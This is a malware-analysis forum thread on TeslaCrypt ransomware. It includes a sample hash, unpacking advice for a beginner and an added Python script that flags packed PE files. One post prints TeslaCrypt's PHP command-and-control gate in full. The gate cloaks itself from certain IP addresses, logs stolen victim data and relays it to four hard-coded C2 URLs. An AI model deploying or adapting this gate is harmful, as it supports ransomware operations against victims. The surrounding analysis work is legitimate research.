A forum for reverse engineering, OS internals and malware analysis 

Forum for analysis and discussion about malware.
 #28077  by rough_spear
 Sun Mar 20, 2016 6:11 pm
Hi,

Teslacrypt malware executable.

MD5 - 280D48953880C4A27DF69957916F718F

Regards,

rough_spear.
Attachments
password - infected.
 #28287  by nautiyal.ashish
 Tue Apr 12, 2016 8:33 am
Cody Johnston wrote: AlphaCrypt - this looks heavily based on TeslaCrypt (based on some quick static analysis anyways)

I originally found a post about it here http://www.malware-traffic-analysis.net ... index.html

Attaching the sample for convenience

https://www.virustotal.com/en/file/7bdc ... 430412022/
Hi,
I tried to perform analysis on this sample.
Based on static and basic dynamic analysis, I was able to figure out its functionality.
But when I moved to OllyDbg and IDA Pro to dig deeper, I felt completely lost.
I am relatively new to reverse engineering and have analysed 5-6 malware samples to date. Every time I checked them in IDA Pro/OllyDbg, I could actually see them using Windows libraries and it was kind of easy to follow the flow of execution.
However, with this sample, I know they are using many Windows libraries because of prior analysis, but they seem to be used in a different way (I am assuming via GetProcAddress). Because of this I am not able to see the flow of execution and it's hard for me to answer questions like what kind of encryption technique is in use.
Can someone tell me how to approach situations like these?
Appreciate the help :)

Regards,
Ashish
 #28293  by maximusdecimer
 Wed Apr 13, 2016 4:57 am
Ashish,

The first level of today's malware would be polymorphic code. Sometimes two or three levels of polymorphic code can be expected. This is called FUD, to avoid AV detection. Try to spend a couple of weeks to unpack them.
Very painful indeed, but learn to enjoy it. OllyDbg is enough to unpack most of the samples.

Maximus
 #28424  by nautiyal.ashish
 Wed Apr 27, 2016 6:05 am
maximusdecimer wrote: Ashish,

The first level of today's malware would be polymorphic code. Sometimes two or three levels of polymorphic code can be expected. This is called FUD, to avoid AV detection. Try to spend a couple of weeks to unpack them.
Very painful indeed, but learn to enjoy it. OllyDbg is enough to unpack most of the samples.

Maximus
Hi Maximusdecimer,
Thank you for the advice. I had been trying to analyse it and found, as you mentioned, that this is self-modifying code. Right now I am still struggling with getting a dump of the actual infecting code and its OEP. However, after each analysis, I believe my understanding of the process is developing.
I tried using the common OllyDbg plugin approach of setting a breakpoint on section hop to find the OEP, but I guess the code is able to successfully evade it. If I succeed I will post my findings here :)
Regards,
Ashish
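Ashish's question (imports resolved at run time, so the static call graph is nearly empty) and Maximus's answer (the sample is packed, so unpack it first) can both be checked before spending days in OllyDbg. The following is an added example, not code from this thread: a Python triage script that reads the PE section table and import directory with no third-party libraries and flags the usual packer signs (a near-empty import table, a section with entropy above 7 bits/byte, or a section with virtual size but no raw data). The PE image it runs on is constructed in build_sample_pe and is not any real sample; the 7.0-bit and two-DLL thresholds are assumptions.

```python
import math
import struct

def shannon_entropy(data: bytes) -> float:
    """Bits per byte: near 0 for constant data, 8.0 for byte-uniform data."""
    n = len(data)
    return -sum(data.count(b) / n * math.log2(data.count(b) / n) for b in set(data)) if n else 0.0

def parse_pe(pe: bytes):
    """Minimal PE32/PE32+ header walk (no pefile): section table and import-directory RVA."""
    e_lfanew = struct.unpack_from("<I", pe, 0x3C)[0]
    if pe[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("not a PE image")
    nsec, opt = struct.unpack_from("<H", pe, e_lfanew + 6)[0], e_lfanew + 24
    opt_size = struct.unpack_from("<H", pe, e_lfanew + 20)[0]
    dd = opt + (112 if struct.unpack_from("<H", pe, opt)[0] == 0x20B else 96)  # data directories
    import_rva = struct.unpack_from("<I", pe, dd + 8)[0]                        # entry 1 = imports
    sections = [struct.unpack_from("<8sIIII", pe, opt + opt_size + 40 * i) for i in range(nsec)]
    return [(n.rstrip(b"\0").decode("ascii", "replace"), *rest) for n, *rest in sections], import_rva

def count_import_dlls(pe: bytes, sections, import_rva: int) -> int:
    """Walk IMAGE_IMPORT_DESCRIPTOR entries (20 bytes each) until the all-zero terminator."""
    off = next((import_rva - va + rptr for _, vs, va, rs, rptr in sections   # RVA -> file offset
                if rs and va <= import_rva < va + max(vs, rs)), None)
    n = 0
    while off is not None and any(pe[off:off + 20]):
        n, off = n + 1, off + 20
    return n

def triage(pe: bytes) -> dict:
    """Packer heuristics: few import DLLs, a high-entropy section, or a section with no raw bytes."""
    sections, import_rva = parse_pe(pe)
    secs = [{"name": n, "entropy": round(shannon_entropy(pe[rp:rp + rs]), 2), "vsize": vs, "rsize": rs}
            for n, vs, va, rs, rp in sections]
    dlls = count_import_dlls(pe, sections, import_rva)
    packed = dlls <= 2 or any(s["entropy"] > 7.0 or (s["rsize"] == 0 and s["vsize"] > 0) for s in secs)
    return {"import_dlls": dlls, "sections": secs, "looks_packed": packed}

def build_sample_pe() -> bytes:
    """Constructed PE32 image for the demo (not any real sample): one import DLL, a byte-uniform
    section (entropy 8.0) and an empty section that an unpacking stub would fill at run time."""
    sec = lambda name, vs, va, rs, rp: struct.pack("<8sIIIIIIHHI", name, vs, va, rs, rp, 0, 0, 0, 0, 0x60000020)
    hdr = b"MZ" + b"\0" * 58 + struct.pack("<I", 0x40)                              # e_lfanew = 0x40
    hdr += b"PE\0\0" + struct.pack("<HHIIIHH", 0x14C, 3, 0, 0, 0, 224, 0x102)       # 3 sections, PE32
    hdr += struct.pack("<H", 0x10B) + b"\0" * 102 + struct.pack("<II", 0x1000, 40) + b"\0" * 112
    hdr += sec(b".text", 0x1000, 0x1000, 0x200, 0x400) + sec(b".pack", 0x1000, 0x2000, 0x400, 0x600)
    hdr += sec(b".empty", 0x4000, 0x3000, 0, 0)
    descriptor = struct.pack("<IIIII", 0x1100, 0, 0, 0x1200, 0x1300) + b"\0" * 20   # one DLL + terminator
    return hdr.ljust(0x400, b"\0") + descriptor.ljust(0x200, b"\x90") + bytes(range(256)) * 4
```

Run triage(open(path, "rb").read()) on a real file; a report with one or two import DLLs and a high-entropy section is the signal that the visible import table is not where the real API usage lives.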
 #28438  by benkow_
 Sat Apr 30, 2016 1:17 pm
PHP gate version april 2016.
Code:
<?php
$network=ip2long("23.96.0.0");
$mask=ip2long("255.248.0.0");
$remote=ip2long($_SERVER['REMOTE_ADDR']);
if (($remote & $mask)==$network){     header("Location: http://google.com");    exit; }
if($_SERVER['REMOTE_ADDR']=='63.211.192.5'){     header("Location: http://google.com");    exit; }
 
if(!isset($_POST['data'])){        die("empty post");     }
$post = array('data'=>$_POST['data'], 'IP'=>$_SERVER['REMOTE_ADDR'], 'SHELL'=>$_SERVER['SERVER_NAME'],);
 
$gate = array(
    "http://u24er.ovaarmor.com/ing.php",
    "http://l123d.feustude.at/ing.php",
    "http://k234s.ascotsprue.com/ing.php",
    "http://ik4dm.mazerunci.at/ing.php",
);
$fp = fopen("most128.txt", "a+");
fwrite($fp, 'data='.$_POST['data'].' IP='.$_SERVER['REMOTE_ADDR'].' SHELL='.$_SERVER['SERVER_NAME']."\n");
fclose($fp);

foreach( $gate as $value ){
    $process = curl_init();
    curl_setopt($process, CURLOPT_URL, $value);
    curl_setopt($process, CURLOPT_POST, 1);
    curl_setopt($process, CURLOPT_POSTFIELDS,$post);
    curl_setopt($process, CURLOPT_RETURNTRANSFER, true);
    if( ! $result = curl_exec($process)) { continue;}
    if(stristr($result,"work:")){echo $result; curl_close($process);die();}
    if(stristr($result,"INSERTED")){echo $result;curl_close($process);die();}
    curl_close($process);
}
?>
Stupid question: does someone know what this IP 63.211.192.5 is?
 #33154  by rammsteinse
 Fri Aug 16, 2019 1:46 am
Hello, I was infected with this ransomware sample "TeslaCrypt Ransomware.rar"; some important files were encrypted and now they have the extension "ecc". I have tried several tools to decrypt them and none has worked for me. I need help, some of these files are very important for me, PLEASE HELP.